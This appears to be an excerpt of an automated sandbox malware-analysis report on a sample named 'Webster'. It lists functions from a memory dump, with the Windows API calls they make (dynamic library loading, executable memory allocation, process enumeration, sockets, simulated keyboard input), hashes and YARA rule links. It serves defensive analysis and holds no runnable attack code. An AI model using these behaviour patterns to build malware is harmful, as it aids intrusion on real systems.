                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                  • API String ID: 2574300362-4033151799
                                                                                  • Opcode ID: 428d6eb36702fc46ce698849c55b8d8902042bf2de1d144a76acccedc23ddb55
                                                                                  • Instruction ID: 0ae3479feffaedd3a493322521c933fa4a89d3c14bd0899f14982815cdeaab40
                                                                                  • Opcode Fuzzy Hash: 428d6eb36702fc46ce698849c55b8d8902042bf2de1d144a76acccedc23ddb55
                                                                                  • Instruction Fuzzy Hash: 80D0EC315107129FD7205F7588086467AD4AF06395F11C86AA4D5E32A0DAB4D8D08A10
                                                                                  Function 00A955F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00A95E3D), ref: 00A955FE
                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A95610
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                  • API String ID: 2574300362-192647395
                                                                                  • Opcode ID: 2c5ff5faa911ff1590bc2e2a4a23235edd6e6c281668e059e0ce8003dca8d673
                                                                                  • Instruction ID: b6521e1fc90d4fd276caba1fe76e9068a4f9459adbb400b12b1f9f2640992e72
                                                                                  • Opcode Fuzzy Hash: 2c5ff5faa911ff1590bc2e2a4a23235edd6e6c281668e059e0ce8003dca8d673
                                                                                  • Instruction Fuzzy Hash: 0CD0C234D30712DFD7206F34C84928676D4AF01391B84C829E481D2160DAB4C4C0C740
                                                                                  Function 00AF97CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00AF93DE,?,00B10980), ref: 00AF97D8
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00AF97EA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                  • API String ID: 2574300362-199464113
                                                                                  • Opcode ID: 9f27618abca23767b5e7ba8e6a4ebf1a6be0e0c7ba381eb318f10a9c0a4391e5
                                                                                  • Instruction ID: b029210898dede58f376e6ef9b985a0b87fd45d25780095c44a0a84b27948f79
                                                                                  • Opcode Fuzzy Hash: 9f27618abca23767b5e7ba8e6a4ebf1a6be0e0c7ba381eb318f10a9c0a4391e5
                                                                                  • Instruction Fuzzy Hash: 75D0C730420317DFD720AF74D888796B2E4BF04381F50C82AF482EA160EFB4C8C0CA40
                                                                                  Function 00AD7D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 18d4307764dc75f25d2d1d8a7443e55ae5f1564472936850166d8b82ea6d31ee
                                                                                  • Instruction ID: b58041e328b954a39cd7e047ee3e6dc23bcc4092d1582a5fdffc6d8184cb3d3d
                                                                                  • Opcode Fuzzy Hash: 18d4307764dc75f25d2d1d8a7443e55ae5f1564472936850166d8b82ea6d31ee
                                                                                  • Instruction Fuzzy Hash: C8C17F75A00216EFCB18CF98C884EAEB7B5FF48714B158599E806EB351DB35ED81CB90
                                                                                  Function 00AFE713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00AFE7A7
                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00AFE7EA
                                                                                    • Part of subcall function 00AFDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00AFDEAE
                                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00AFE9EA
                                                                                  • _memmove.LIBCMT ref: 00AFE9FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 3659485706-0
                                                                                  • Opcode ID: 0cd5f5e89fdd72273810c184051e80b0c955b80f98f7a8523deaddbad426e905
                                                                                  • Instruction ID: 560dab4a2a0ef22faa7ad1f1d576d9a9c7b776bf31411a65e1e552cb7b15cafb
                                                                                  • Opcode Fuzzy Hash: 0cd5f5e89fdd72273810c184051e80b0c955b80f98f7a8523deaddbad426e905
                                                                                  • Instruction Fuzzy Hash: 4CC18971A083058FC714EF68C48096ABBE4FF89754F04896EF999DB361D731E946CB82
                                                                                  Function 00AF877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 00AF87AD
                                                                                  • CoUninitialize.OLE32 ref: 00AF87B8
                                                                                    • Part of subcall function 00B0DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00AF8A0E,?,00000000), ref: 00B0DF71
                                                                                  • VariantInit.OLEAUT32(?), ref: 00AF87C3
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AF8A94
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 780911581-0
                                                                                  • Opcode ID: 70852f16d7c38be48d3a1ea79c2fb11409981f348264d73a38cc232f45c327c5
                                                                                  • Instruction ID: b447d682520c8902b4ba251550ce9fe271f241135e0c5061653f25815c88cd06
                                                                                  • Opcode Fuzzy Hash: 70852f16d7c38be48d3a1ea79c2fb11409981f348264d73a38cc232f45c327c5
                                                                                  • Instruction Fuzzy Hash: 53A17A35604B069FD710EFA4C581B2AB7E4FF88354F148849FA969B3A1DB74ED40CB92
                                                                                  Function 00AD814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B13C4C,?), ref: 00AD8308
                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B13C4C,?), ref: 00AD8320
                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00B10988,000000FF,?,00000000,00000800,00000000,?,00B13C4C,?), ref: 00AD8345
                                                                                  • _memcmp.LIBCMT ref: 00AD8366
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 314563124-0
                                                                                  • Opcode ID: afcb37a6f2f6976dfa9627ede599b9be21e4f626d7b99c05a413e004d8af7d62
                                                                                  • Instruction ID: 6b0518f31e1ddc3859ed9fc478a5d77bcce59d238950c93b428c900114ea35e2
                                                                                  • Opcode Fuzzy Hash: afcb37a6f2f6976dfa9627ede599b9be21e4f626d7b99c05a413e004d8af7d62
                                                                                  • Instruction Fuzzy Hash: 62814971A00109EFCB04DF94C988EEEB7B9FF89715F204599E516AB250DB71AE06CB60
                                                                                  Function 00AD749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                                  • String ID:
                                                                                  • API String ID: 2808897238-0
                                                                                  • Opcode ID: 682e935aead25261afd47356889bce32e091b08778859d4ba10dbc986ee06561
                                                                                  • Instruction ID: 035094105b36f2580e33984877d08a3320340403b6ccd77296035489c43df623
                                                                                  • Opcode Fuzzy Hash: 682e935aead25261afd47356889bce32e091b08778859d4ba10dbc986ee06561
                                                                                  • Instruction Fuzzy Hash: DE51C434608B029BDB28AF79D995A2DF7F5AF45310B20881FE547CB7A1FB70D8808B05
                                                                                  Function 00AFF4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00AFF526
                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00AFF534
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00AFF5F4
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00AFF603
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2576544623-0
                                                                                  • Opcode ID: 779009f7f03090f6bf797709ded167f75647dec5cd0344a6c19d28747ca40955
                                                                                  • Instruction ID: 011c5e04d6bed97431507a40510b4bc04b3332d929de123d0ecc8d019009635f
                                                                                  • Opcode Fuzzy Hash: 779009f7f03090f6bf797709ded167f75647dec5cd0344a6c19d28747ca40955
                                                                                  • Instruction Fuzzy Hash: D3517DB1108315AFD710EF64D885EABB7E8EF98710F40492DF595D72A1EB70E904CB92
                                                                                  Function 00AA492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2782032738-0
                                                                                  • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                  • Instruction ID: 4a47fb3dc1865ed6052fe873d806a37ab1972d76f38230d3dd327252adcfaeff
                                                                                  • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                  • Instruction Fuzzy Hash: 844196356007069BDF288F69C9909AFBBA5AFCA3A0B24817DF455C76D0D7B09D508B44
                                                                                  Function 00ADA638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00ADA68A
                                                                                  • __itow.LIBCMT ref: 00ADA6BB
                                                                                    • Part of subcall function 00ADA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00ADA976
                                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00ADA724
                                                                                  • __itow.LIBCMT ref: 00ADA77B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$__itow
                                                                                  • String ID:
                                                                                  • API String ID: 3379773720-0
                                                                                  • Opcode ID: c9f46a88f3c6c3b3d1dda04dc284d010ead889c99a66df17a02dadd1a4d1c8cd
                                                                                  • Instruction ID: 6080cd1a51a77141f773811419129b00a835be486a4442838adfa2c4d2fd6c0e
                                                                                  • Opcode Fuzzy Hash: c9f46a88f3c6c3b3d1dda04dc284d010ead889c99a66df17a02dadd1a4d1c8cd
                                                                                  • Instruction Fuzzy Hash: C4416E75A00309ABDF11EF54C956BEE7BB9EF54750F04006AF906A3391DB709A44CAA2
                                                                                  Function 00AF7095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00AF70BC
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF70CC
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00AF7130
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF713C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                                                  • String ID:
                                                                                  • API String ID: 2214342067-0
                                                                                  • Opcode ID: 30d4bb683f21737946782f50192c9e0028974e1dcacab24514e3dbaf283f37a7
                                                                                  • Instruction ID: c9e78a2e96474157aa257a85cd524055c6821c62aeba25f99af041643e5eebdf
                                                                                  • Opcode Fuzzy Hash: 30d4bb683f21737946782f50192c9e0028974e1dcacab24514e3dbaf283f37a7
                                                                                  • Instruction Fuzzy Hash: 9A41BF717442016FEB24BF64DD86F7E77E4AB08B14F048558FA199B3D2EBB09C008B91
                                                                                  Function 00AF6B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B10980), ref: 00AF6B92
                                                                                  • _strlen.LIBCMT ref: 00AF6BC4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen
                                                                                  • String ID:
                                                                                  • API String ID: 4218353326-0
                                                                                  • Opcode ID: cd763a538b98c9cbd4e2ba9a6e58470fa405ee2b289f67dde26d9b54b962fce2
                                                                                  • Instruction ID: 9f7f0e57f539fd3fcd88f5711863c12c5b10ff2df7572545612a786800754964
                                                                                  • Opcode Fuzzy Hash: cd763a538b98c9cbd4e2ba9a6e58470fa405ee2b289f67dde26d9b54b962fce2
                                                                                  • Instruction Fuzzy Hash: 01419071A00109AFCB14FBA4DE96EBEB3B9EF58310F148155F95A9B292DF30AD41C790
                                                                                  Function 00B08E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B08F03
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: InvalidateRect
                                                                                  • String ID:
                                                                                  • API String ID: 634782764-0
                                                                                  • Opcode ID: bbef8703af188368302601d889c63a598404f5a65e71e72500b8efde6b3efae7
                                                                                  • Instruction ID: cb1252776e8fd23b2b3dd8e2ff221cf79a50af50e1d9854f44ba9ed68a948b7f
                                                                                  • Opcode Fuzzy Hash: bbef8703af188368302601d889c63a598404f5a65e71e72500b8efde6b3efae7
                                                                                  • Instruction Fuzzy Hash: 7631C33465411AEEEF209A24CC85BAC3FE6EB06320F544991FA91D71E1CFB0DB50CB91
                                                                                  Function 00B0B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ClientToScreen.USER32(?,?), ref: 00B0B1D2
                                                                                  • GetWindowRect.USER32(?,?), ref: 00B0B248
                                                                                  • PtInRect.USER32(?,?,00B0C6BC), ref: 00B0B258
                                                                                  • MessageBeep.USER32(00000000), ref: 00B0B2C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1352109105-0
                                                                                  • Opcode ID: 4ffd8f1ce4ab8e59355f9a1d760c1b6e96bd82fc80ddb339c47dc19f332f787a
                                                                                  • Instruction ID: 8f9e54fd1c236fc6cb2e6a132714f8d25c8cbc6d50825a4a39cce0d9f31ab7ab
                                                                                  • Opcode Fuzzy Hash: 4ffd8f1ce4ab8e59355f9a1d760c1b6e96bd82fc80ddb339c47dc19f332f787a
                                                                                  • Instruction Fuzzy Hash: E8414734A04219DFDB11DF99C884EAD7FF5FB4A350F1885E9E8189B2A5DB30A941CB90
                                                                                  Function 00AE12D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00AE1326
                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00AE1342
                                                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00AE13A8
                                                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00AE13FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                  • String ID:
                                                                                  • API String ID: 432972143-0
                                                                                  • Opcode ID: ae89d288b6509ccdc0639dac26125dd74fe89d98ccf0e5e1abfe6932ab4cd24f
                                                                                  • Instruction ID: 3bcbc4e818bbf3c8dbdd15eee4f9128d505e4b381903c64e9495f7673674a46c
                                                                                  • Opcode Fuzzy Hash: ae89d288b6509ccdc0639dac26125dd74fe89d98ccf0e5e1abfe6932ab4cd24f
                                                                                  • Instruction Fuzzy Hash: A3316E709402A9AEFF3187278C05BFEBBB6AB44310F04831AF4D05A6D5D3748D919B51
